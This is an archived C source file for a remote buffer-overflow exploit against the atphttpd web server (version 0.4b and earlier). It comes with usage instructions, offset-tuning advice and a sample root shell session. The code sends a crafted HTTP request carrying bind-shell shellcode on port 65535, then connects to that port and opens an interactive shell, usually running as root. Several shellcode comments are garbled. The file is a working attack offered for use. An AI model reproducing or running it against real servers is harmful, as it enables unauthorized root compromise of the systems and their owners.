home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / atphttpd / atphttp0x06.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  10.0 KB  |  266 lines
  1. /******************************* 0-day ;]****************************************\
  2. **********************************************************************************
  3. ** Remote atphttpd <= 0.4b linux exploit by r-code d_fence@gmx.net              **
  4. **                                                                              **
  5. ** The exploit was successfuly tested against Debian 3.0 (Woody)                **
  6. ** and Red Hat 8.0 (Psyche) (both) with atphttpd 0.4b (latest)                  **
  7. ** installed from source..                                                      **
  8. **                                                                              **
  9. ** The exploit gains the privilages of the user who runs atphttpd               **
  10. ** which is usually root.. the offsets may vary even for the same               **
  11. ** distros.. (e.g. on two different woody`s with the same athttpd               **
  12. ** installed on I got two different offsets working 1300 and 2400), so you      **
  13. ** you might have to play with them...                                          **
  14. **                                                                              **
  15. ** example:                                                                    **
  16. **                                                                              **
  17. ** bash~$ ./athttpd localhost 2400                                              **
  18. **                                                                              **
  19. **(<->) Atphttpd <= 0.4b remote exploit by r-code d_fence@gmx.net               **
  20. **(<->) Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher          **
  21. **                                                                              **
  22. ** <==> OFFSET: 0x8fc                                                           **
  23. ** <==> RET_ADDR: 0xbffff6fe                                                    **
  24. ** <==> Connecting to 'localhost' on port '80'..                                **
  25. ** <==> Sending packets..                                                       OO
  26. **                                                                              **
  27. ** ### Exploit failed ... just kidding ;]                                       **
  28. ** ### Exploit successful - enjoy your shell                                    **
  29. **                                                                              **
  30. ** uid=0(root) gid=0(root) groups=0(root)                                       **
  31. **  23:25:51 up  3:21,  1 user,  load average: 0.44, 0.41, 0.42                 **
  32. **  USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT       **
  33. **  root     tty1     -                20:05    3:19m  2.32s  2.22s  -bash      **
  34. **  Linux coredump 2.4.20 #1 czw sie 7 22:04:49 UTC 2003 i686 unknown           **
  35. ** /atphttpd-0.4b                                                               **
  36. **readline: warning: rl_prep_terminal: cannot get terminal settingsbash-2.05a#  **
  37. **********************************************************************************
  38. **********************************************************************************/ 
  39.  
  40.  
  41. #include <stdio.h>
  42. #include <netinet/in.h>
  43. #include <stdlib.h>
  44. #include <netdb.h>
  45. #include <unistd.h>
  46. #include <sys/socket.h>
  47. #include <errno.h>
  48.  
  49. /* Bind shellcode (port 65535) by Ramon de Carvalho Valle  */
  50.  
  51. char shellcode[]= /*  72 bytes                          */
  52.     "\x31\xdb"              /*  xorl    %ebx,%ebx                 */
  53.     "\xf7\xe3"              /*  mull    %ebx                      */
  54.     "\x53"                  /*  pushl   %ebx                      */
  55.     "\x43"                  /*  incl    %ebx                      */
  56.     "\x53"                  /*  pushl   %ebx                      */
  57.     "\x6a\x02"              /*  pushl   -bashx02                     */
  58.     "\x89\xe1"              /*  movl    %esp,%ecx                 */
  59.     "\xb0\x66"              /*  movb    -bashx66,%al                 */
  60.     "\xcd\x80"              /*  int     -bashx80                     */
  61.     "\xff\x49\x02"          /*  decl    0x02(%ecx)                */
  62.     "\x6a\x10"              /*  pushl   -bashx10                     */
  63.     "\x51"                  /*  pushl   %ecx                      */
  64.     "\x50"                  /*  pushl   %eax                      */
  65.     "\x89\xe1"              /*  movl    %esp,%ecx                 */
  66.     "\x43"                  /*  incl    %ebx                      */
  67.     "\xb0\x66"              /*  movb    -bashx66,%al                 */
  68.     "\xcd\x80"              /*  int     -bashx80                     */
  69.     "\x89\x41\x04"          /*  movl    %eax,0x04(%ecx)           */
  70.     "\xb3\x04"              /*  movb    -bashx04,%bl                 */
  71.     "\xb0\x66"              /*  movb    -bashx66,%al                 */
  72.     "\xcd\x80"              /*  int     -bashx80                     */
  73.     "\x43"                  /*  incl    %ebx                      */
  74.     "\xb0\x66"              /*  movb    -bashx66,%al                 */
  75.     "\xcd\x80"              /*  int     -bashx80                     */
  76.     "\x59"                  /*  popl    %ecx                      */
  77.     "\x93"                  /*  xchgl   %eax,%ebx                 */
  78.     "\xb0\x3f"              /*  movb    -bashx3f,%al                 */
  79.     "\xcd\x80"              /*  int     -bashx80                     */
  80.     "\x49"                  /*  decl    %ecx                      */
  81.     "\x79\xf9"              /*  jns     <bindsocketshellcode+45>  */
  82.     "\x68\x2f\x2f\x73\x68"  /*  pushl   -bashx68732f2f               */
  83.     "\x68\x2f\x62\x69\x6e"  /*  pushl   -bashx6e69622f               */
  84.     "\x89\xe3"              /*  movl    %esp,%ebx                 */
  85.     "\x50"                  /*  pushl   %eax                      */
  86.     "\x53"                  /*  pushl   %ebx                      */
  87.     "\x89\xe1"              /*  movl    %esp,%ecx                 */
  88.     "\xb0\x0b"              /*  movb    -bashx0b,%al                 */
  89.     "\xcd\x80"              /*  int     -bashx80                     */;
  90.  
  91. #define LEN 820
  92. #define DEFAULT_OFFSET 2400         /* Offsets might be betwen 1000-3000 , you can try in 100 steps*/
  93. #define PORT 80                     /* Default port */
  94. #define ALIGN 1
  95.     
  96. int connect_to_host(char *hs,int port)
  97. {
  98.         int                     sock,x;
  99.         struct sockaddr_in      addr;
  100.     struct hostent  *host;
  101.     
  102.     if(!(host = gethostbyname(hs))) {
  103.         perror("gethostbyname(): while resolving host");
  104.         exit(1);
  105.     }
  106.     
  107.     
  108.         addr.sin_family = AF_INET;
  109.         addr.sin_port = htons(port);
  110.     bcopy(host->h_addr,&addr.sin_addr,host->h_length);
  111.  
  112.         if((sock = socket(AF_INET, SOCK_STREAM, 0))<0)         {
  113.                 perror("socket() error");
  114.                 return(-1);
  115.         }
  116.  
  117.         if((x = connect(sock, (struct sockaddr *)&addr, sizeof(addr)))<0) {
  118.                 perror("connect() error");
  119.                 return(-1);
  120.         }
  121.  
  122.         return sock;
  123. }
  124.  
  125.  
  126.  
  127. void shell(int sd)
  128. {
  129.         int check;
  130.         char cmd[]="id; w; uname -a; pwd;export TERM=vt100; exec /bin/bash -i\n";
  131.         char buf[2048];
  132.             fd_set fd;
  133.  
  134.             bzero(buf,2048);
  135.         send(sd,cmd,strlen(cmd),0);
  136.  
  137.         while(1)  {
  138.     
  139.             fflush(stdout);
  140.             FD_ZERO(&fd);
  141.             FD_SET(sd,&fd);
  142.             FD_SET(STDIN_FILENO,&fd);
  143.             select(sd+1,&fd,NULL,NULL,NULL);
  144.         
  145.             if(FD_ISSET(sd,&fd))   {
  146.                 if((check=read(sd,buf,2048))<=0)
  147.                     exit(1);
  148.             
  149.             buf[check]=0;
  150.             printf("%s",buf);
  151.             }
  152.         
  153.             if(FD_ISSET(STDIN_FILENO,&fd))    {
  154.                 if((check=read(STDIN_FILENO,buf,2048))>0) {
  155.                     buf[check]=0;
  156.                 write(sd,buf,check);
  157.                 }
  158.             }
  159.         }
  160.         return;
  161. }
  162.  
  163.  
  164.  
  165.  
  166. int main(int argc,char **argv) {
  167.     int i,sd;
  168.     char http_req[LEN];
  169.     unsigned long int ret=0,offset=DEFAULT_OFFSET;
  170.  
  171.  
  172.     printf("(<->) Atphttpd <= 0.4b remote exploit by r-code d_fence@gmx.net\n");
  173.     printf("(<->) Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher\n\n");
  174.     
  175.  
  176.     if(argc<2 || argc>3){
  177.         printf("[-] Usage: %s [host] <offset> #OFFset\n",argv[0]);
  178.         return -1;
  179.     }
  180.             
  181.     
  182.     if(argc>2)
  183.         offset=atoi(argv[2]);
  184.     
  185.     ret=0xbffffffa - offset;
  186.     
  187.     printf("<==> OFFSET: 0x%x\n",offset);
  188.     printf("<==> RET_ADDR: 0x%x\n",ret);
  189.             
  190.  
  191.     /* See comment few lines below ;] */
  192.     
  193.     http_req[0x00]='G';
  194.     http_req[0x01]='E';
  195.     http_req[0x02]='T';
  196.     http_req[0x03]=' ';
  197.     http_req[0x04]='/';
  198.     
  199.      for(i=0x05;i<LEN;) {
  200.          http_req[ALIGN + i++] = (ret & 0x000000ff);
  201.          http_req[ALIGN + i++] = (ret & 0x0000ff00) >> 8;
  202.          http_req[ALIGN + i++] = (ret & 0x00ff0000) >> 16;
  203.          http_req[ALIGN + i++] = (ret & 0xff000000) >> 24;
  204.      }
  205.  
  206.     
  207.      for(i=0x05;i<(LEN/2);i++)
  208.          http_req[i]=0x41;          /* Using jump-next instruction instead of nops for a better look ;] */
  209.          
  210.          for(i=0;i<strlen(shellcode);i++)
  211.              http_req[(LEN/2)-(strlen(shellcode)/2)+i]=shellcode[i];
  212.              
  213.      
  214.     http_req[LEN-0x0c]=' ';
  215.     http_req[LEN-0x0b]='H';
  216.     http_req[LEN-0x0a]='T';
  217.     http_req[LEN-0x09]='T';
  218.     http_req[LEN-0x08]='P';
  219.     http_req[LEN-0x07]='/';
  220.     http_req[LEN-0x06]='1';
  221.     http_req[LEN-0x05]='.';
  222.     http_req[LEN-0x04]='1';
  223.     http_req[LEN-0x03]=0x0d;
  224.     http_req[LEN-0x02]=0x0a;
  225.     http_req[LEN-0x01]=0x00;
  226.  
  227.     /* Yeah.. I know I just could strcpy/cat it ;].. but so it looks soooooo l33t ;] aint`t it ? ;) */
  228.     
  229.     printf("<==> Connecting to '%s' on port '%d'..\n",argv[1],PORT);
  230.     
  231.     if((sd=connect_to_host(argv[1],PORT))<0) {
  232.         printf("<==> Couldn`t connect to host.. :-/\n");
  233.         exit(1);
  234.     }
  235.     
  236.     printf("<==> Sending packets..\n");
  237.             
  238.         
  239.     if(send(sd,http_req,LEN,0)<0) {
  240.         perror("<==> send(): while sending evil http request");
  241.         return -1;
  242.     }
  243.  
  244.     close(sd);
  245.         
  246.     if((sd=connect_to_host(argv[1],65535))<0) {
  247.         printf("<==> Exploit failed..! #Probably due to a bad offset\n");
  248.         return -1;
  249.     }
  250.  
  251.  
  252.     printf("\n### Exploit failed ");
  253.     fflush(stdout);
  254.     sleep(1);
  255.     printf("... just kidding ;]\n");
  256.     sleep(1);
  257.     printf("### Exploit successful - enjoy your shell\n\n");
  258.     shell(sd);
  259.     
  260.     return 1;
  261. }
  262.  
  263.  
  264.  
  265.  
  266.